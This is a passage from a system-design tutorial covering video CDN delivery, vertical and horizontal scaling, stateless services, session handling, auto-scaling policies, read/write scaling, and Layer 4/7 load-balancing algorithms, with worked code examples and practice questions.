- Pre-compress with Brotli at build time, and serve modern, correctly-sized image formats.
🧪 Practice
- Set up caching headers for a build output containing hashed JS/CSS, an unhashed favicon, and
index.html.- Explain why splitting vendor and application bundles improves repeat-visit performance, with a concrete byte estimate.
- Interview: A deploy goes out but users see a broken page mixing old and new assets. What happened? (Hint: consider which file they cached and which one it points to.)
Media Streaming Delivery
Video is the hardest content type a CDN handles: files are enormous, viewers have wildly different bandwidth, and a user who waits more than a couple of seconds leaves. Downloading a whole video before playing is impossible, and serving one fixed quality means either buffering on slow connections or wasting bandwidth on fast ones.
Adaptive bitrate streaming (ABR) solves both. The video is encoded at several quality levels and cut into small segments (typically 2-10 seconds). The player downloads a manifest listing the available renditions, then picks a segment quality for each segment based on measured throughput and buffer level — switching mid-playback as conditions change.
ADAPTIVE BITRATE STRUCTURE
master.m3u8 (manifest of manifests)
|-- 1080p/ -> index.m3u8 -> [seg0.ts][seg1.ts][seg2.ts]... 5000 kbps
|-- 720p/ -> index.m3u8 -> [seg0.ts][seg1.ts][seg2.ts]... 2500 kbps
|-- 480p/ -> index.m3u8 -> [seg0.ts][seg1.ts][seg2.ts]... 1000 kbps
`-- 240p/ -> index.m3u8 -> [seg0.ts][seg1.ts][seg2.ts]... 400 kbps
Playback: [720p seg0][720p seg1][1080p seg2][480p seg3][720p seg4]
^
bandwidth dropped mid-stream; the player stepped
down rather than buffering. The viewer sees a
quality dip instead of a spinner.
Every segment is a normal, immutable HTTP GET — which is why a CDN can cache
video at all. This is the whole trick: streaming became a caching problem.
# Segments are perfectly cacheable; manifests are not (for live).
CACHE_RULES = {
"*/segment-*.ts": "public, max-age=31536000, immutable", # never changes
"*/index.m3u8": "public, max-age=2", # LIVE: rewritten
# as segments are added
"*/master.m3u8": "public, max-age=3600", # rendition list is stable
}
# For video on demand, even the media manifest is immutable and cached for a
# year. For live, the media manifest changes every segment duration, so its TTL
# must be shorter than the segment length — this one setting is the difference
# between a working live stream and one stuck several minutes behind.
| Protocol | Origin | Segment format | Notes |
|---|---|---|---|
| HLS | Apple | .ts or fMP4 | Universal support; the safe default |
| DASH | MPEG | fMP4 | Codec-agnostic; common outside Apple |
| CMAF | Standard | fMP4 | One set of segments serves HLS and DASH — halves storage and doubles CDN hit ratio |
| WebRTC | W3C | RTP | Sub-second latency; not CDN-cacheable |
Three design points decide the viewer's experience:
- Segment duration trades latency against efficiency. Two-second segments give ~6-10 s of live latency and more requests; ten-second segments are more cache-efficient but push live latency to 30 s or more.
- The ladder (the set of renditions) should be chosen from the audience's actual bandwidth distribution, not copied from a blog post.
- CMAF with a single segment set is the biggest infrastructure win available: without it you store and cache two copies of every segment for HLS and DASH separately, halving your hit ratio for no benefit.
For live streaming, the additional constraint is that content is created as it is consumed, so low-latency modes (LL-HLS, LL-DASH) use partial segments and HTTP chunked transfer to get latency to 2-5 seconds. True sub-second interaction requires WebRTC, which bypasses CDN caching entirely and therefore does not scale the same way.
Key Takeaways
- ABR encodes several qualities in short segments; the player adapts per segment to available bandwidth.
- Segments are immutable HTTP objects, which is what makes video CDN-cacheable at all.
- For live, the media manifest TTL must be shorter than the segment duration.
- Segment length trades live latency against caching efficiency; CMAF lets one segment set serve both HLS and DASH.
🧪 Practice
- Design a bitrate ladder for an audience that is 60% mobile, and justify each rendition.
- Compute the storage for a 2-hour film at four renditions and explain what CMAF saves.
- Interview: Viewers report a live stream running 45 seconds behind. What do you check? (Hint: two settings compound — how long each segment is, and how long each cache layer holds the manifest.)
<a id="6-scalability-and-load-management"></a>
6. Scalability and Load Management
Scalability is the property that lets a system absorb more work by adding resources; load management is the set of techniques that decide where each request goes and what happens when there is more work than capacity. This chapter covers how systems grow — vertically, horizontally, and by removing state — how traffic is spread across the machines that result, how a system protects itself when demand exceeds supply, and how services find one another once there are too many instances to configure by hand.
<a id="61-scaling-approaches"></a>
6.1 Scaling Approaches
Before choosing load balancers or auto-scaling rules, you need a clear model of what "adding capacity" actually means, which parts of a system can absorb it, and why state is the thing that decides whether scaling is easy or painful.
Vertical Scaling
Vertical scaling — "scaling up" — means giving one machine more resources: more CPU cores, more RAM, faster disks, a bigger network card. The program does not change; the box underneath it gets bigger.
The reason to start here is that vertical scaling is free of distributed systems problems. One machine has one clock, one memory space, one copy of the data, and no network between its parts. Every problem that dominates later chapters — replication lag, consensus, partial failure, split brain — simply does not exist inside a single process. An engineer who reaches for a cluster before exhausting a single machine often pays a large complexity bill to solve a problem they did not yet have.
Modern hardware makes this argument stronger than most people assume. A single cloud instance can be had with 128 or more cores and multiple terabytes of RAM. A well-indexed relational database on such a machine comfortably serves tens of thousands of transactions per second — more than the majority of production systems will ever need.
The analogy is a restaurant kitchen. Vertical scaling is buying a bigger stove and hiring a faster chef for the same kitchen. It works beautifully, until the kitchen itself is full — and then no amount of money buys a bigger one.
Vertical scaling has three hard limits:
- A physical ceiling. There is a largest instance type, and you cannot buy past it.
- Superlinear cost. Price per unit of capacity rises steeply at the top of the range; the biggest instance often costs far more than twice the one half its size.
- A single failure domain. One machine means one thing to lose, and restarting it for a kernel patch is a full outage. Vertical scaling improves capacity and does nothing at all for availability.
COST PER UNIT OF CAPACITY AS THE MACHINE GROWS
$/vCPU
| *
| *
| *
| *
| * *
| *
+--------------------------------------------> instance size
2 8 32 64 96 128 vCPU
The flat middle is the sweet spot. Past it you pay a premium for the
privilege of not having to distribute -- sometimes worth it, but that is a
purchase decision, not an engineering one.
# When does scaling up stop being the cheaper option?
# Illustrative on-demand prices for one instance family.
prices = {4: 0.20, 8: 0.40, 16: 0.80, 32: 1.70, 64: 3.60, 128: 9.80}
for vcpu, hourly in prices.items():
per_vcpu = hourly / vcpu
# Cost of the same vCPU count assembled from 8-vCPU machines instead.
horizontal = (vcpu / 8) * prices[8]
print(f"{vcpu:>4} vCPU ${hourly:>5.2f}/h ${per_vcpu:.4f}/vCPU "
f"horizontal equivalent ${horizontal:.2f}/h")
# 4 vCPU $ 0.20/h $0.0500/vCPU horizontal equivalent $0.20/h
# 8 vCPU $ 0.40/h $0.0500/vCPU horizontal equivalent $0.40/h
# 16 vCPU $ 0.80/h $0.0500/vCPU horizontal equivalent $0.80/h
# 32 vCPU $ 1.70/h $0.0531/vCPU horizontal equivalent $1.60/h
# 64 vCPU $ 3.60/h $0.0563/vCPU horizontal equivalent $3.20/h
# 128 vCPU $ 9.80/h $0.0766/vCPU horizontal equivalent $6.40/h
#
# Up to ~16 vCPU the premium is zero: scale up, it is strictly simpler.
# At 128 vCPU you pay ~53% extra to avoid distributing. That may still be
# cheaper than the engineering time to shard -- compute it, do not guess.
Vertical scaling is also the correct first move for components that are genuinely hard to distribute: a primary write node, a single-writer ledger, a graph traversal that touches everything. For those, "buy a bigger box" buys years of runway.
Key Takeaways
- Vertical scaling adds resources to one machine and introduces no distributed systems problems — it is the simplest capacity increase available.
- Modern single machines are far larger than most workloads need; exhaust this option before sharding.
- Its limits are a physical ceiling, superlinear cost near the top, and an unchanged single point of failure.
- Scaling up improves capacity, never availability.
🧪 Practice
- Using the price table above, compute the cost premium of a 128-vCPU instance versus sixteen 8-vCPU instances, and state one reason to pay it.
- Your database runs at 70% CPU on a 32-vCPU machine and traffic grows 20% per quarter. How many quarters of headroom does doubling the instance buy?
- Interview: A team says they must shard Postgres because it is "at capacity". What do you ask before agreeing? (Hint: capacity of which resource — and is the bottleneck the hardware or one unindexed query?)
Horizontal Scaling
Horizontal scaling — "scaling out" — means adding more machines and spreading work across them. Instead of one server handling 10,000 requests per second, ten servers handle 1,000 each.
The reason to pay its complexity cost is that it removes both of vertical scaling's fatal limits at once. There is no ceiling: capacity becomes a number you choose. And because the work is spread over independent machines, losing one removes a fraction of capacity rather than the whole service. Horizontal scaling is the only approach that improves availability and capacity together.
Back to the kitchen: horizontal scaling is opening a second and third kitchen. Now you need a way to route orders to a kitchen (load balancing), a way to know which kitchens are open (health checks and discovery), and a shared understanding of the menu and inventory (state). Those three needs are the entire rest of this chapter.
VERTICAL HORIZONTAL
+----------------+ +------+ +------+ +------+
| | | node | | node | | node |
| one large | +------+ +------+ +------+
| server | ^ ^ ^
| | | | |
+----------------+ +---------+---------+
^ |
| +-----------+
clients | LB |
+-----------+
^
|
clients
Failure of the single box = 100% outage.
Failure of one node of 3 = 33% capacity loss, zero downtime.
The catch is that horizontal scaling does not scale everything. Amdahl's law applies directly: any serialized component — one primary database, one global lock, one sequence generator — caps the whole system no matter how many application servers you add.
# Adding app servers only helps until a shared dependency saturates.
DB_CAPACITY = 12_000 # queries/sec the single primary can serve
PER_REQUEST_QUERIES = 3 # each request issues 3 queries
APP_CAPACITY = 900 # requests/sec one app server handles
for servers in (1, 5, 10, 40):
app_limit = servers * APP_CAPACITY
db_limit = DB_CAPACITY / PER_REQUEST_QUERIES # 4000 rps, FIXED
effective = min(app_limit, db_limit)
bound_by = "app tier" if app_limit < db_limit else "DATABASE"
print(f"{servers:>3} servers -> {effective:>6.0f} rps (bound by {bound_by})")
# 1 servers -> 900 rps (bound by app tier)
# 5 servers -> 4000 rps (bound by DATABASE)
# 10 servers -> 4000 rps (bound by DATABASE)
# 40 servers -> 4000 rps (bound by DATABASE)
#
# Past ~5 servers you buy capacity you cannot use. The next dollar belongs in
# caching, read replicas, or query reduction -- not in more app nodes.
| Dimension | Vertical scaling | Horizontal scaling |
|---|---|---|
| Ceiling | Largest instance available | Effectively unbounded |
| Cost curve | Superlinear at the top | Roughly linear |
| Complexity added | None | Balancing, discovery, coordination |
| Availability | Unchanged (single domain) | Improves with instance count |
| Downtime to grow | Usually a restart | None (add an instance) |
| Data consistency | Trivial (one copy) | Replication and partitioning |
The rule most teams converge on: scale up the hard-to-distribute tier, scale out the easy-to-distribute tier. Application servers, usually stateless, scale out. Databases scale up first and out only when forced.
Key Takeaways
- Horizontal scaling adds machines and is the only path with no capacity ceiling.
- It improves availability as a side effect: one instance failing costs a fraction of capacity.
- Its cost is coordination — balancing, discovery, replication, consistency.
- The system scales only as far as its least-scalable shared dependency.
🧪 Practice
- Rework the code above assuming a cache absorbs 70% of queries. How many app servers become useful?
- Draw the request path for a horizontally scaled web tier and mark every component that is still a single instance.
- Interview: You add ten servers and throughput does not move. Name three plausible causes and the metric that distinguishes them. (Hint: look for the resource whose utilization did not change when you added capacity.)
Stateless Service Design
A service is stateless when any instance can serve any request, because everything needed to handle that request either arrives with it or is fetched from shared storage. Nothing important lives only in that instance's memory.
This is the single property that makes horizontal scaling practical. If any instance can serve any request, instances become interchangeable, and a family of hard problems dissolves at once: the load balancer routes freely, a crashed instance loses nothing, deployments replace instances one at a time, and auto-scaling adds or removes capacity without migrating anything.
Stateless does not mean the system has no state — sessions, carts, and uploads all exist. It means the state does not live in the application process. It is pushed outward into a database, a cache, or the request itself.
The analogy is a bank teller. A stateless teller keeps nothing about you at their window: your balance is in the bank's ledger, so any teller can serve you. A stateful teller has your file in their drawer — and when they go to lunch, you wait for them specifically.
STATEFUL: instance memory holds the truth
client A --> [ node 1 ] session{A}, cart{A}, upload-buffer{A}
client B --> [ node 2 ] session{B}
X node 2 dies -> B's session is gone
STATELESS: instance memory holds only what the current request needs
client A --> [ node 1 ] --\
client B --> [ node 2 ] ---+--> [ session store / DB / cache ]
client A --> [ node 3 ] --/
X node 2 dies -> nothing lost, retry anywhere
// Stateful: correctness depends on the client returning to the same instance.
const carts = new Map(); // lives in THIS process only
app.post('/cart/items', (req, res) => {
const cart = carts.get(req.userId) ?? []; // lost on restart, and invisible
cart.push(req.body.item); // to every other instance
carts.set(req.userId, cart);
res.json({ items: cart.length });
});
// Stateless: the instance is a pure function of (request, shared state).
app.post('/cart/items', async (req, res) => {
const userId = verifyJwt(req.headers.authorization).sub; // identity travels
// with the request
await redis.rpush(`cart:${userId}`, JSON.stringify(req.body.item));
await redis.expire(`cart:${userId}`, 60 * 60 * 24 * 7); // bounded lifetime
const items = await redis.llen(`cart:${userId}`);
res.json({ items }); // ANY instance produces this
});
Making a service stateless is mostly a hunt for hidden state. The usual offenders:
| Hidden state | Symptom when you scale out | Fix |
|---|---|---|
| In-memory sessions | Random logouts | External session store or signed token |
| Local file uploads | "File not found" on a later request | Object storage |
| In-process schedulers | The job runs N times, once per instance | Distributed lock or scheduler service |
| Local rate-limit counters | Effective limit is N x the configured one | Shared counter in Redis |
| In-memory caches | Inconsistent reads between instances | Acceptable if TTL-bounded, else shared |
| WebSocket connections | Cannot push to a user on another instance | Pub/sub fan-out between instances |
The last two are often kept local on purpose. A per-instance cache with a short TTL is fine when staleness is tolerable. The test is not "does memory hold anything?" but "if this instance vanished mid-request, would anything be lost that the system cannot reconstruct?"
Key Takeaways
- Stateless means any instance can serve any request; state lives in shared storage or travels with the request.
- It is the precondition for free load balancing, painless deploys, and auto-scaling.
- Statelessness is about durability of location, not about having zero memory — bounded local caches are fine.
- Audit for hidden state: sessions, local files, in-process timers, local counters, long-lived connections.
🧪 Practice
- Take the stateful cart handler above and list every failure that appears once a second instance sits behind a round-robin load balancer.
- A service writes uploaded images to
/tmpand serves them on a later request. Describe two ways to make it stateless and the trade-off between them.- Interview: Your service runs a nightly report from an in-process cron. What breaks at three instances, and how do you fix it? (Hint: you need exactly one execution — what primitive produces a single winner across machines?)
Session Management and Sticky Sessions
Sessions are the most common form of state in a web system, so how you store them largely determines how freely you can scale. There are three viable designs, one of which is a compromise worth understanding well enough to avoid.
1. Sticky sessions (session affinity). Keep sessions in instance memory and have the load balancer send each client back to the same instance every time, usually via a cookie or a hash of the client IP.
2. External session store. Keep sessions in a shared store (Redis, Memcached, a database). Any instance serves any request after one extra hop.
3. Client-side sessions (tokens). Put the session data in a signed token held by the client. No server-side lookup at all.
STICKY SHARED STORE CLIENT-SIDE TOKEN
client --cookie:node2--+ client --> LB --> any client --JWT--> any
| | |
LB pins to node2 | v verify
v +-----------+ signature
[ node 2 mem ] | Redis | locally
X dies +-----------+
session lost survives node loss no lookup
Sticky sessions need no code change, but they undercut most of the benefits of horizontal scaling:
- Uneven load. Long-lived clients pile onto whichever instance they landed on; a newly added instance receives only new sessions and stays idle for hours.
- Failure is user-visible. Losing an instance logs out everyone pinned to it.
- Deploys hurt. Every rolling restart drops sessions unless you drain slowly.
- Auto-scaling is hobbled. You cannot remove an instance without affecting the users pinned to it.
// Client-side session: state travels in a signed token.
const token = jwt.sign(
{ sub: user.id, roles: user.roles, tier: 'premium' }, // small, non-secret
process.env.JWT_SECRET,
{ expiresIn: '15m' } // SHORT: a token cannot be un-issued, so the
); // expiry IS your revocation window
const claims = jwt.verify(token, process.env.JWT_SECRET); // no network call
// Server-side session: one extra hop, but revocable instantly.
await redis.setex(`sess:${sid}`, 1800, JSON.stringify(sessionData));
await redis.del(`sess:${sid}`); // logout/ban takes effect on the next request
| Approach | Scale-out | Revocation | Failure impact | Extra latency | Size limit |
|---|---|---|---|---|---|
| Sticky | Poor | Immediate | Pinned users lose their sessions | None | Memory-bound |
| Shared store | Good | Immediate | None (store is HA) | ~1 ms lookup | Large |
| Signed token | Excellent | Only at expiry | None | None | ~4-8 KB cookie |
The common production answer is a hybrid: a short-lived signed access token for cheap, lookup-free authentication, plus a server-side refresh token so sessions stay revocable. That gives the scaling properties of tokens with the control of a session store.
Sticky sessions remain legitimately useful for stateful protocols such as WebSockets, in-progress multipart uploads, and per-instance caches warmed for one tenant. Use affinity as a performance optimization the system can survive losing — never as a correctness requirement.
Key Takeaways
- Sticky sessions require no code change but reintroduce the problems statelessness solves: uneven load, session loss, painful deploys.
- A shared session store scales well and keeps sessions revocable, at the cost of a lookup per request.
- Signed tokens remove the lookup entirely but cannot be revoked before expiry — so keep expiry short.
- Prefer a short access token plus a server-side refresh token; treat affinity as an optimization, not a requirement.
🧪 Practice
- A JWT is issued with a 24-hour expiry and the user is banned an hour later. Describe exactly what that user can still do, and for how long.
- Your load balancer uses IP-hash affinity and one corporate customer behind a single NAT gateway sends 30% of traffic. What happens, and what do you change?
- Interview: Design session handling for a service that must support instant logout across devices at 100k requests/second. (Hint: the fast path can stay lookup-free if only the rare, slow-changing case needs a lookup.)
Auto-Scaling Policies
Auto-scaling adjusts the number of instances automatically in response to load. The promise is obvious — pay for what you use, absorb spikes without paging anyone — but a naive policy oscillates, reacts too late, or scales the wrong tier entirely.
The core difficulty is that scaling is not instantaneous. Between a metric crossing a threshold and a new instance serving traffic sits a chain of delays: metric aggregation, alarm evaluation, provisioning, boot, application startup, cache warming, and health-check passes. The total is often two to five minutes. Auto-scaling is therefore a control system with significant lag, and control systems with lag oscillate unless they are damped.
THE SCALING LAG
load | _____________________
| / \
| / \
|_______/ \______
+----------------------------------------------> time
^ ^ ^ ^
| | | |
spike metric alarm instance
starts scraped fires in service
|<-60s->|<-30s->|<---- 120s ---->|
|<--------- ~3.5 min of degraded service ------->|
You cannot remove this lag; you can only start earlier (predictive or
scheduled scaling) or absorb it (headroom, queues, load shedding).
There are four policy types, and mature systems combine them:
| Policy type | Trigger | Best for |
|---|---|---|
| Target tracking | Keep a metric at a set point | The default for steady workloads |
| Step scaling | Tiered thresholds, bigger steps for bigger breaches | Sharp, unpredictable spikes |
| Scheduled | Time of day or day of week | Known patterns (business hours) |
| Predictive | Forecast from history | Strong daily or weekly seasonality |
Choosing the metric matters more than choosing the policy. CPU is the default and is often wrong: an I/O-bound service saturates on connections or queue depth while CPU sits at 30%. The right metric is the one that correlates with user-visible latency — usually backlog per consumer for a queue worker, and concurrent requests per instance for a request service.
# Target tracking on a demand-side metric, with damping.
scaling_policy:
metric: requests_in_flight_per_instance # not CPU: this tracks latency
target: 25 # load tests: p99 degrades past ~35
min_instances: 4 # survive an AZ loss at minimum
max_instances: 60 # a cost guardrail AND a blast-radius
# limit on runaway scale-out
scale_out:
cooldown_seconds: 60 # short: being late is expensive
max_step: 100% # allow doubling under a real spike
scale_in:
cooldown_seconds: 300 # long: being early causes flapping
max_step: 10% # remove capacity slowly
# Why asymmetric cooldowns matter: the cost of being wrong is asymmetric.
#
# Scaling out unnecessarily -> you pay for one extra instance for 5 minutes.
# Scaling in unnecessarily -> you drop below capacity, latency spikes, and
# recovery costs the FULL scaling lag.
#
# Therefore: scale out fast and aggressively, scale in slowly and timidly.
import math
def desired_instances(current_rps, rps_per_instance, headroom=0.30, azs=3):
"""Capacity sizing with explicit headroom to cover the scaling lag."""
raw = current_rps / rps_per_instance
with_headroom = raw / (1 - headroom) # never plan to run at 100%
# Round up to a multiple of the AZ count so each AZ carries an equal share.
return max(azs, math.ceil(with_headroom / azs) * azs)
print(desired_instances(9_000, 400)) # 33 -> the headroom IS the lag budget
Two failure modes deserve names. Flapping is repeated scale-out/scale-in
caused by thresholds that sit too close together or cooldowns that are too
short; fix it with hysteresis (different thresholds for out and in) and a longer
scale-in cooldown. Scaling into a bottleneck is worse: the app tier scales
out, each new instance opens a database connection pool, and the database falls
over. Always ask what the new instances will consume, and cap max_instances
at what the dependencies can survive.
Key Takeaways
- Auto-scaling has an unavoidable lag of minutes; headroom, schedules, or prediction are the only ways to cover it.
- Scale on a metric that tracks user-visible latency (in-flight requests, queue backlog), not reflexively on CPU.
- Make cooldowns asymmetric: out fast, in slow — the costs of error are not symmetric.
max_instancesis a blast-radius control for downstream dependencies, not only a budget cap.
🧪 Practice
- A service scales out at 70% CPU and in at 65%. Describe the oscillation this produces and give two fixes.
- Write a scaling policy for a video-transcoding worker pool. Which metric do you target, and why is it not CPU?
- Interview: Traffic quadruples in 30 seconds when a marketing email lands, and auto-scaling takes 4 minutes. How do you serve those 4 minutes? (Hint: auto-scaling is not the only lever — what can absorb or refuse load meanwhile?)
Scaling Reads vs. Scaling Writes
Reads and writes are not symmetric, and treating them as one workload is a common design error. Most systems are read-dominated — often 100:1 or more — and reads have a property writes do not: they can be served from any copy of the data.
That difference is everything. To serve more reads you add copies: caches, read replicas, CDN nodes, materialized views. Each copy is independent, so read capacity scales close to linearly. Writes must be applied to the authoritative copy in a defined order, so adding machines does not help unless you split the data itself into independent partitions.
The analogy is a library. Adding photocopies of a popular book lets a hundred people read it at once. But if the book must be edited, every copy has to agree on the new text — and now the copies are a liability, not an asset.
SCALING READS: add copies SCALING WRITES: split the data
[ primary ] [ shard A ] users a-h
| replication [ shard B ] users i-p
+----------+----------+ [ shard C ] users q-z
v v v
[replica] [replica] [replica] Each shard is an independent
^ ^ ^ write path, so capacity scales
| | | with shard count -- but a write
reads reads reads spanning two shards now needs a
distributed transaction.
Cheap and near-linear, but STALE
by the replication lag.
The read-scaling ladder, cheapest and most effective first:
| Technique | Read capacity gain | Cost |
|---|---|---|
| Client/CDN cache | Enormous | Staleness bounded by TTL |
| Application cache | 10-100x | Invalidation complexity |
| Read replicas | Linear in replica count | Replication lag; read-your-writes bugs |
| Materialized views | Large for specific queries | Refresh cost and staleness |
| Denormalization | Removes joins | Write amplification, update anomalies |
The write-scaling ladder is shorter, and each rung costs more:
| Technique | Write capacity gain | Cost |
|---|---|---|
| Batching / coalescing | 5-50x | Added latency, partial-failure handling |
| Write-behind buffering | Large | Durability risk while buffered |
| Async queue absorption | Smooths peaks | Eventual consistency, backlog management |
| Sharding | Linear in shards | Cross-shard queries and transactions, rebalancing |
# Read/write asymmetry decides where the money goes.
READ_QPS, WRITE_QPS = 48_000, 600 # a typical ~80:1 social feed
REPLICA_CAPACITY, PRIMARY_CAPACITY = 8_000, 12_000
cache_hit_rate = 0.92 # a modest, realistic cache
reads_to_db = READ_QPS * (1 - cache_hit_rate)
replicas_needed = -(-reads_to_db // REPLICA_CAPACITY) # ceil division
print(f"reads reaching the DB: {reads_to_db:.0f}/s -> {replicas_needed:.0f} replica(s)")
print(f"writes: {WRITE_QPS}/s -> {WRITE_QPS / PRIMARY_CAPACITY:.1%} of one primary")
# reads reaching the DB: 3840/s -> 1 replica(s)
# writes: 600/s -> 5.0% of one primary
#
# The cache did more for read capacity than any number of replicas would have,
# and sharding this system would be wasted complexity: the primary is at 5%.
# Shard when WRITES run out of room, not reads.
The sequencing rule: cache reads, batch writes, shard last. Reach for sharding only when a single primary genuinely cannot absorb the write rate or hold the working set, because sharding is the one step that permanently changes which queries and transactions your application is allowed to express.
Key Takeaways
- Reads scale by adding copies (caches, replicas, views); writes scale only by splitting data or reducing write volume.
- Most systems are read-dominated, so caching usually beats every other lever on cost-effectiveness.
- Every read-scaling technique trades freshness for capacity — set the staleness budget explicitly.
- Shard for write volume or dataset size, never for read volume.
🧪 Practice
- Recompute the example with a 60% cache hit rate. How many replicas are needed, and what does that say about cache tuning versus replica count?
- Give a concrete example of a read that cannot be served from a replica, and explain what you would do instead.
- Interview: An e-commerce system handles 50k product views/sec and 200 orders/sec. Which side do you scale first, and how? (Hint: compute what fraction of a single primary the write path actually uses.)
<a id="62-load-balancing"></a>
6.2 Load Balancing
Once there is more than one instance, something must decide which instance each request goes to. That decision — made at a layer, by an algorithm, over a set of backends known to be healthy — is load balancing.
Layer 4 vs. Layer 7 Load Balancing
The first decision about a load balancer is how deeply it inspects traffic, and the answer is expressed in OSI layers. A Layer 4 balancer works with TCP/UDP connections: it sees IP addresses and ports and forwards packets or connections without reading their contents. A Layer 7 balancer terminates the connection, parses the application protocol (usually HTTP), and makes decisions using URLs, headers, cookies, and methods.
The trade-off is understanding versus cost. L4 is a postal sorter reading only
the address on the envelope: fast, cheap, protocol-agnostic, and completely
unable to help you if routing depends on what is inside. L7 opens the envelope
and reads the letter: it can route /api/v2/* to one pool and /images/* to
another, retry a failed request on a different backend, and compress responses —
but it must do TLS termination and protocol parsing for every request.
LAYER 4 LAYER 7
client client
| TCP connection | TCP + TLS terminated HERE
v v
[ L4 LB ] reads: src/dst IP:port [ L7 LB ] reads: method, path,
| forwards the connection | headers, cookies, body
| (often NAT or DSR) | opens a SEPARATE
v v connection to the backend
[ backend ] sees the raw stream [ backend ] sees a NEW request
(client IP only via
X-Forwarded-For)
A crucial operational consequence: because an L7 balancer opens its own
connection to the backend, the backend no longer sees the client's IP address.
The real client IP must be carried in a header (X-Forwarded-For, or the
standardized Forwarded), and any code that logs, rate-limits, or geolocates by
IP must read that header — while trusting it only when it comes from your own
proxy, since clients can forge it.
| Property | Layer 4 | Layer 7 |
|---|---|---|
| Inspects | IP, port | URL, headers, cookies, method |
| Throughput | Very high (millions of pps) | Lower (parsing + TLS per request) |
| Added latency | Microseconds | Sub-millisecond to milliseconds |
| Protocol support | Any TCP/UDP | Specific (HTTP, gRPC, WebSocket) |
| Content-based routing | No | Yes |
| Retry a failed request | No (connection-level only) | Yes |
| TLS termination | Passthrough | Usually terminates |
| Sees client IP | Yes | Only via forwarded headers |
| Typical products | AWS NLB, IPVS, MetalLB | NGINX, Envoy, HAProxy, AWS ALB |
# Layer 7: routing decisions that require reading the request.
upstream api_v2 { server 10.0.1.10:8080; server 10.0.1.11:8080; }
upstream images { server 10.0.2.10:8080; }
server {
listen 443 ssl;
location /api/v2/ {
proxy_pass http://api_v2;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; # backend
proxy_set_header X-Forwarded-Proto $scheme; # loses the client IP
proxy_next_upstream error timeout http_502; # L7 can RETRY the request
}
location /images/ {
proxy_pass http://images;
proxy_cache image_cache; # only possible at L7
}
}
The mature pattern is not to choose but to layer them: an L4 balancer at the edge absorbing raw connection volume and spreading it across a fleet of L7 proxies, which then make the smart routing decisions. This is how most large sites are built — L4 for scale, L7 for intelligence.
Key Takeaways
- L4 balances connections using IP and port; L7 balances requests using URL, headers, and cookies.
- L7 costs more per request but enables content routing, request retries, caching, and header manipulation.
- L7 hides the client IP from backends; carry it in
X-Forwarded-Forand trust the header only from your own proxies.- Large systems commonly use L4 at the edge in front of an L7 tier.
🧪 Practice
- List three routing rules that are impossible at L4 and explain why.
- A backend logs every client as
10.0.0.5. Diagnose the cause and give the fix, including the security caveat.- Interview: You must balance a custom binary protocol over TCP at two million connections. Which layer, and what do you give up? (Hint: which layer needs to understand the protocol to work at all?)
Round Robin and Weighted Algorithms
Round robin is the simplest balancing algorithm: keep a pointer, hand each new request to the next backend, wrap around at the end. It requires no state about backends, no measurement, and no coordination — which is exactly why it is the default nearly everywhere.
Round robin is correct when two assumptions hold: backends are identical, and requests cost roughly the same. When either fails, it distributes requests evenly while distributing load unevenly, which is the thing you actually care about.
Weighted round robin repairs the first assumption. Each backend gets a weight proportional to its capacity, and receives that share of requests. This is what you use during a migration to a larger instance type, or when running a mixed fleet.
ROUND ROBIN (equal) WEIGHTED ROUND ROBIN (3:2:1)
req 1 -> A req 1 -> A A: weight 3 (16 vCPU)
req 2 -> B req 2 -> A B: weight 2 (8 vCPU)
req 3 -> C req 3 -> A C: weight 1 (4 vCPU)
req 4 -> A req 4 -> B
req 5 -> B req 5 -> B
req 6 -> C req 6 -> C -> then repeat
Smooth WRR interleaves instead of bursting: A B A C A B -- the same
ratio, but no backend receives three requests back to back.
# Smooth weighted round robin (the algorithm NGINX and Envoy use).
# Naive WRR sends w_i requests in a row to each backend, which bursts.
# This version interleaves while preserving the exact ratio.
class SmoothWRR:
def __init__(self, backends): # backends: {name: weight}
self.weights = dict(backends)
self.current = {name: 0 for name in backends}
self.total = sum(backends.values())
def next(self):
for name, w in self.weights.items():
self.current[name] += w # everyone accumulates their weight
best = max(self.current, key=self.current.get) # highest credit wins
self.current[best] -= self.total # winner pays the full total back
return best
lb = SmoothWRR({"A": 3, "B": 2, "C": 1})
print([lb.next() for _ in range(6)])
# ['A', 'B', 'A', 'C', 'A', 'B'] -> exact 3:2:1 ratio, no bursts
Round robin's real weakness is that it is open-loop: it never observes the consequences of its own decisions. If backend B is garbage collecting, swapping, or stuck behind a slow dependency, round robin keeps feeding it one request in three anyway. Worse, a backend that fails fast — instantly returning 500 — finishes requests quickly and therefore looks perfectly healthy to any algorithm that counts requests rather than outcomes.
| Variant | State needed | Handles uneven backends | Handles uneven requests |
|---|---|---|---|
| Round robin | A counter | No | No |
| Weighted round robin | Static weights | Yes | No |
| Random | None | No | No (but no sync bursts) |
| Random with two choices | Live conn counts | Partly | Yes |
That last row deserves a mention because it is remarkably effective for its cost: pick two backends at random, send the request to whichever has fewer in-flight requests. It needs almost no coordination yet removes nearly all of the imbalance of pure random selection — a well-known result usually called "the power of two choices."
Key Takeaways
- Round robin is stateless and fair in request count, which equals fairness in load only when backends and requests are uniform.
- Weighted round robin handles heterogeneous fleets; use smooth WRR to avoid bursting onto one backend.
- Round robin is open-loop: it cannot notice that a backend has become slow.
- Two random choices plus a load comparison gets most of the benefit of least-connections at almost no coordination cost.
🧪 Practice
- Trace smooth WRR by hand for weights A=5, B=1 over eight requests.
- Half your fleet is 16-vCPU and half is 4-vCPU under plain round robin. Describe the observable symptom and compute the correct weights.
- Interview: One backend returns errors in 5 ms while healthy ones take 200 ms. What happens under round robin versus least-connections? (Hint: which backend has the fewest in-flight requests when it fails instantly?)
Least Connections and Least Response Time
Least connections is a closed-loop algorithm: instead of assuming backends are equivalent, it measures how many requests each is currently handling and sends the next request to the least busy one. It is the natural answer when request costs vary widely — one request returns a cached value in 2 ms while another runs a report for 4 seconds.
The insight behind it is Little's Law. For a backend, concurrency = arrival rate x service time. In-flight connection count is therefore a live signal that
folds in both how much work a backend has been given and how slowly it is
handling it. A backend that is slow for any reason — GC pause, cold cache,
noisy neighbour, a slow dependency — accumulates in-flight requests, and least
connections automatically routes around it without anyone configuring anything.
SAME MOMENT, TWO ALGORITHMS
backend in-flight avg latency
-------- --------- -----------
A 2 20 ms
B 31 340 ms <- GC pause, slow dependency, whatever
C 3 25 ms
Round robin -> next request goes to B (it is simply B's turn).
Least conns -> next request goes to A (2 < 3 < 31).
Least resp time -> A as well, and it would keep avoiding B even if B's
queue drained while its latency stayed high.
